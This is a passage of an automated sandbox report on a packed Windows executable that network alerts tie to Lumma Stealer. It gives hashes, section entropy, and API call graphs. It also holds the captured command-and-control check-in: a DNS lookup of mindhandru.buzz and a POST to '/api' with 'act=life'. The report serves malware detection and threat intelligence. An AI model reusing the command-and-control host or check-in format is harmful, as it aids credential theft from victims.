                                Original Sample Name:f1f1fb7ce16d5883ea795e1ebbafcf7a.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@1/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                Time | Type | Description
                                02:49:33 | API Interceptor | 2x Sleep call for process: PH1D3KHmOD.exe modified
                                                    No created / dropped files found
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.949298049487091
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:PH1D3KHmOD.exe
                                                    File size:1'867'776 bytes
                                                    MD5:f1f1fb7ce16d5883ea795e1ebbafcf7a
                                                    SHA1:76f16e6397a95661beeefa1ad5d033c819bdd884
                                                    SHA256:d01629b4c91f9bdffa26efc4e7666093d830ec350d4e7435ad525813645a6af9
                                                    SHA512:ed9a9225669b1fde54f6f1e234d391105e44e1ea7fdf1b5ea428178d2cc9a6fc17bdeea23b9b81cf74bf177fd302d570e6493f077fe81eb1c923065d183176c7
                                                    SSDEEP:49152:eFBxdOFtXROhwSt5Ecj5GKDyd5NlEmxh:eFvdOFtXROhwStOEm6
                                                    TLSH:FD8533931DA29BBECCDFC9F64577A0D51F78EC4E2210C1106A04F2B9D5CAAC939768C9
                                                    Icon Hash: 90cececece8e8eb0
                                                    Entrypoint: 0x89d000
                                                    Entrypoint Section: .taggant
                                                    Digitally signed: false
                                                    Imagebase: 0x400000
                                                    Subsystem: windows gui
                                                    Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major: 6
                                                    OS Version Minor: 0
                                                    File Version Major: 6
                                                    File Version Minor: 0
                                                    Subsystem Version Major: 6
                                                    Subsystem Version Minor: 0
                                                    Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                     | 0x1000 | 0x52000 | 0x26400 | 6a182c338dd80fd8086a5980eaeb84e7 | False | 0.9992659824346405 | data | 7.968015840636174 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                     | 0x55000 | 0x2a9000 | 0x200 | 25b4108814f5229c6d0683affad87774 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    rlrmwtje | 0x2fe000 | 0x19e000 | 0x19de00 | 10591c050203565cf37e4099a3ce1579 | False | 0.9950118921775899 | data | 7.954785719367017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    txntjrfm | 0x49c000 | 0x1000 | 0x600 | d7fd963349143811b258f2b066771660 | False | 0.5670572916666666 | data | 5.05547442056436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant | 0x49d000 | 0x3000 | 0x2200 | ed190571b664176d9045689ea380f707 | False | 0.06020220588235294 | DOS executable (COM) | 0.7429342904559886 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                    RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                                                    DLL | Import
                                                    kernel32.dll | lstrcpy
                                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                    2024-12-27T08:49:33.176795+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 172.67.165.185 | 443 | TCP
                                                    2024-12-27T08:49:34.173741+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 172.67.165.185 | 443 | TCP
                                                    2024-12-27T08:49:34.173741+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 172.67.165.185 | 443 | TCP
                                                    2024-12-27T08:49:35.367925+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 172.67.165.185 | 443 | TCP
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Dec 27, 2024 08:49:31.400677919 CET | 50540 | 53 | 192.168.2.4 | 1.1.1.1
                                                    Dec 27, 2024 08:49:31.548150063 CET | 53 | 50540 | 1.1.1.1 | 192.168.2.4
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Dec 27, 2024 08:49:31.400677919 CET | 192.168.2.4 | 1.1.1.1 | 0x7a29 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Dec 27, 2024 08:49:31.548150063 CET | 1.1.1.1 | 192.168.2.4 | 0x7a29 | No error (0) | mindhandru.buzz | | 172.67.165.185 | A (IP address) | IN (0x0001) | false
                                                    Dec 27, 2024 08:49:31.548150063 CET | 1.1.1.1 | 192.168.2.4 | 0x7a29 | No error (0) | mindhandru.buzz | | 104.21.11.101 | A (IP address) | IN (0x0001) | false
                                                    • mindhandru.buzz
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.4 | 49730 | 172.67.165.185 | 443 | 6656 | C:\Users\user\Desktop\PH1D3KHmOD.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-12-27 07:49:33 UTC | 262 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8
                                                    Host: mindhandru.buzz
                                                    2024-12-27 07:49:33 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                    Data Ascii: act=life
                                                    2024-12-27 07:49:34 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 27 Dec 2024 07:49:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=tec4d732a1fubrsda15o6o0rk5; expires=Tue, 22 Apr 2025 01:36:12 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajuSgI5o8b0itxnMTy1g4COJoSHP563E%2B2j3PGbwIM3MaVXvcGP%2BdzLG5uUBg9wCtnZf48XH%2FI3D9b%2B383Xjz9AYTzGe9WgL%2BEC7oGYDN1jS5FoFMu0PdGxCV3mWLRx3h8Q%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f87b6f50d1b0f51-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1465&rtt_var=559&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1938911&cwnd=204&unsent_bytes=0&cid=d6763de521990042&ts=1317&x=0"
                                                    2024-12-27 07:49:34 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
                                                    2024-12-27 07:49:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0



                                                    Target ID: 0
                                                    Start time: 02:49:26
                                                    Start date: 27/12/2024
                                                    Path: C:\Users\user\Desktop\PH1D3KHmOD.exe
                                                    Wow64 process (32bit): true
                                                    Commandline: "C:\Users\user\Desktop\PH1D3KHmOD.exe"
                                                    Imagebase: 0xe0000
                                                    File size: 1'867'776 bytes
                                                    MD5 hash: F1F1FB7CE16D5883EA795E1EBBAFCF7A
                                                    Has elevated privileges: true
                                                    Has administrator privileges: true
                                                    Programmed in: C, C++ or other language
                                                    Reputation: low
                                                    Has exited: true


                                                      Execution Graph

                                                      Execution Coverage: 0.8%
                                                      Dynamic/Decrypted Code Coverage: 0%
                                                      Signature Coverage: 27.4%
                                                      Total number of Nodes: 73
                                                      Total number of Limit Nodes: 3

                                                      Control-flow Graph

                                                      APIs
                                                      • ExitProcess.KERNEL32(00000000), ref: 000E8A4A
                                                        • Part of subcall function 000EB7B0: FreeLibrary.KERNEL32(000E8A31), ref: 000EB7B6
                                                        • Part of subcall function 000EB7B0: FreeLibrary.KERNEL32 ref: 000EB7D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary$ExitProcess
                                                      • String ID: b]u)$}$}
                                                      • API String ID: 1614911148-2900034282
                                                      • Opcode ID: 0d365ce41af22e1d04c2a765551b54615c23c03c46c90b9417d079bee6afcdbe
                                                      • Instruction ID: d4245c8f48ca5b4c53d6a89a2497eb32fa70757f159550f1889c3b6da73d9ce2
                                                      • Opcode Fuzzy Hash: 0d365ce41af22e1d04c2a765551b54615c23c03c46c90b9417d079bee6afcdbe
                                                      • Instruction Fuzzy Hash: 3AC1D473E187144FC718DF69C84125AF7D6ABC8710F1EC52EA898EB355EA749C058BC2

                                                      Control-flow Graph

                                                      control_flow_graph 99 11e110-11e142 LdrInitializeThunk
                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(0012148A,?,00000018,?,?,00000018,?,?,?), ref: 0011E13E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 101 121720-121741 102 121750-12176b 101->102 102->102 103 12176d-121779 102->103 104 1217e0-1217e5 103->104 105 12177b-121785 103->105 107 1217eb-1217ff 104->107 108 121879-12187b 104->108 106 121790-121797 105->106 109 121799-1217a7 106->109 110 1217ad-1217b5 106->110 113 121800-12181b 107->113 111 12188d-121894 108->111 112 12187d-121884 108->112 109->106 114 1217a9-1217ab 109->114 110->104 115 1217b7-1217d8 call 11e110 110->115 116 121886 112->116 117 12188a 112->117 113->113 118 12181d-121828 113->118 114->104 123 1217dd 115->123 116->117 117->111 120 121871-121873 118->120 121 12182a-121832 118->121 120->108 122 121875 120->122 124 121840-121847 121->124 122->108 123->104 125 121850-121856 124->125 126 121849-12184c 124->126 125->120 127 121858-12186e call 11e110 125->127 126->124 128 12184e 126->128 127->120 128->120
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: =<32
                                                      • API String ID: 2994545307-852023076
                                                      • Opcode ID: 860fd8f83ec06c000e80182995722be7a71d71ac7b534439f44316010fe17819
                                                      • Instruction ID: 32835d1800aa3b39152806f4180ff2475407d47a63014169840cb9a9c78cbbaf
                                                      • Opcode Fuzzy Hash: 860fd8f83ec06c000e80182995722be7a71d71ac7b534439f44316010fe17819
                                                      • Instruction Fuzzy Hash: 483128387043147BE728DE54ACD1B7BB3A6EB94750F18852CE98557290D731DCA19782

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 62 e9d1e-e9d34 63 e9d40-e9d52 62->63 63->63 64 e9d54-e9d7e 63->64 65 e9d80-e9d92 64->65 65->65 66 e9d94-e9e13 LoadLibraryExW call 11d960 65->66 69 e9e20-e9e32 66->69 69->69 70 e9e34-e9e5e 69->70 71 e9e60-e9e72 70->71 71->71 72 e9e74-e9e80 LoadLibraryExW call 11d960 71->72 74 e9e85-e9e98 72->74
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,00000000), ref: 000E9D98
                                                      • LoadLibraryExW.KERNEL32(?,00000000), ref: 000E9E78
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: cecfa1e5c1700c8c23cf440ec753784d63e25ef3b3f733191ba4de4554832f8e
                                                      • Instruction ID: 3bcefa5e698453e017dd33f7aa98d9b470dba659985029bedf9b6e297ed8feee
                                                      • Opcode Fuzzy Hash: cecfa1e5c1700c8c23cf440ec753784d63e25ef3b3f733191ba4de4554832f8e
                                                      • Instruction Fuzzy Hash: C24101B4D003509FE7249F7899D2A9A7FB1EB06324F50529CD5902F3A6C731981ACBE2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 87 eef53-ef0b5 CoInitializeEx
                                                      APIs
                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 000EF09D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 66e65d860157b5ad7bcd07d22d5b5952751976fa149d0b8cbe3cbf49953e0a0b
                                                      • Instruction ID: cc41f68f9af8072c028509b344a956168a52aecb83bd796261a2ee26ae278131
                                                      • Opcode Fuzzy Hash: 66e65d860157b5ad7bcd07d22d5b5952751976fa149d0b8cbe3cbf49953e0a0b
                                                      • Instruction Fuzzy Hash: CE41D8B4910B40AFD370EF3D994B7137EB8AB05250F504B1EF9E6866D4E231A4198BD7

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 89 eec77-eecbb CoInitializeSecurity
                                                      APIs
                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000EECA3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: InitializeSecurity
                                                      • String ID:
                                                      • API String ID: 640775948-0
                                                      • Opcode ID: e2f47405ff3dc03b03215f3dbc089ea21861dd9effd79e0cb27c94256104b711
                                                      • Instruction ID: e7bd40f17c46d2cd3219354b94362d6fde9f7d2eb9a7ca42ffcb85c49334af7a
                                                      • Opcode Fuzzy Hash: e2f47405ff3dc03b03215f3dbc089ea21861dd9effd79e0cb27c94256104b711
                                                      • Instruction Fuzzy Hash: 22E092347EA3827AF67983149CE3F2621079B42F34E345B04B7213D7D5CAE43152824C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 91 e9eb7-e9ef7 call 11fe00 WSAStartup
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 000E9ED2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID:
                                                      • API String ID: 724789610-0
                                                      • Opcode ID: 6e8050f7acd85c9d4abacdccc9f27eddff88c3c044e6df173c7c28ed0fa418bf
                                                      • Instruction ID: 5d34838b33ebb6131afb4baa06bae947b39bec9a7aabfbfb3214c89672048d12
                                                      • Opcode Fuzzy Hash: 6e8050f7acd85c9d4abacdccc9f27eddff88c3c044e6df173c7c28ed0fa418bf
                                                      • Instruction Fuzzy Hash: FBE02B33641602BBD704DB30EC87E893357EB153417069438E205C1572EB72A472DA50

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 94 11c570-11c57c 95 11c583-11c584 94->95 96 11c585-11c597 call 11f990 RtlFreeHeap 94->96
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(?,00000000,?,0011E0F9), ref: 0011C590
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 42e39f9f203442c4313559fbe0a14143c0911c9a09b21b65c61f3a13ce38d768
                                                      • Instruction ID: e75b45619506aef2d9c5b3719b15979087cd8b76cd1b1da32eb491f41704b7dc
                                                      • Opcode Fuzzy Hash: 42e39f9f203442c4313559fbe0a14143c0911c9a09b21b65c61f3a13ce38d768
                                                      • Instruction Fuzzy Hash: 3DD0C931415122FBC6143F28BC06BC73A94AF59220F0708A1F5046A474D724ECD2CAD0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 100 11c55c-11c568 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 0011C561
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 063853bd35322bfc6fb94da5d70007b7988ef9cf3934e159e77ff68ffd83459b
                                                      • Instruction ID: bdd3ceac74c33e114be86ad25846e13299d043bbac0633f93561997ff19f4aea
                                                      • Opcode Fuzzy Hash: 063853bd35322bfc6fb94da5d70007b7988ef9cf3934e159e77ff68ffd83459b
                                                      • Instruction Fuzzy Hash: 7AA001B11842109ADA562B24BC0AB847A21AB59621F124191E501594B6867298929A84
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 00139215
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 2a6d3715c13e1689ff8065dabd81db49e9a041c50e86955ecca511ed1265c727
                                                      • Instruction ID: b5b8f92a266228a5c80c86ff31d559a09e1c196756357119ae574d5b69463afd
                                                      • Opcode Fuzzy Hash: 2a6d3715c13e1689ff8065dabd81db49e9a041c50e86955ecca511ed1265c727
                                                      • Instruction Fuzzy Hash: 59E06DB5509609DFD7042F38E8985AE7BE0EF08361F220719F8E6CA6C4CB310D508B6A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: Uninitialize
                                                      • String ID:
                                                      • API String ID: 3861434553-0
                                                      • Opcode ID: 4fa263e81630fad94620e057e9bf03b292094efd9e331b4eca2d564ec891b018
                                                      • Instruction ID: d40545ac256b62992aaca00c3c8c8b8fa8e0e6207b88ed25dc7076b9be4a091a
                                                      • Opcode Fuzzy Hash: 4fa263e81630fad94620e057e9bf03b292094efd9e331b4eca2d564ec891b018
                                                      • Instruction Fuzzy Hash: 84C012342680806BC358932199A247B6217CF87348314582AC40741747D670A5528544
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 00139870
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 8cf3413bb104a380bc61f2d7dd7839454efd3bd29604274d5b46156a4d7b174d
                                                      • Instruction ID: 577dc9e4badd664fc2fb38a3acd27a682fa3d024cb8cd05a9675250e554a5af3
                                                      • Opcode Fuzzy Hash: 8cf3413bb104a380bc61f2d7dd7839454efd3bd29604274d5b46156a4d7b174d
                                                      • Instruction Fuzzy Hash: BBD06CB550C248AFEB11AF14C845A7EBAB9EF94700F014928EDC98A250D7321C20DE92
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001043AA
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0010443E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                      • API String ID: 237503144-1429676654
                                                      • Opcode ID: 7d57b0809f4d9f27985e2184ead725f03182b97e3baa7318d7d9e754e509fad3
                                                      • Instruction ID: 860684e37e675f32505778d10de4055899d92da528c475bebb6265a7c5d181df
                                                      • Opcode Fuzzy Hash: 7d57b0809f4d9f27985e2184ead725f03182b97e3baa7318d7d9e754e509fad3
                                                      • Instruction Fuzzy Hash: 1CC20CB560D3848AD334CF14D452BDFBAF2FB82300F00892DD5E96B655D7B1864A8B9B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                      • API String ID: 0-3233044194
                                                      • Opcode ID: 3e5714e30c3d22735f7980ba1f5c4038bb49ba357d465ec8be9c416741daa6ed
                                                      • Instruction ID: 0610db8fcb847b3ac571c2ca353af042bd9474b5ab40700ba5201ec7fd003c17
                                                      • Opcode Fuzzy Hash: 3e5714e30c3d22735f7980ba1f5c4038bb49ba357d465ec8be9c416741daa6ed
                                                      • Instruction Fuzzy Hash: 52C21DB560D3848AE334CF54C452BDFBAF2FB82300F00892DD5E96B655D7B1464A8B9B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
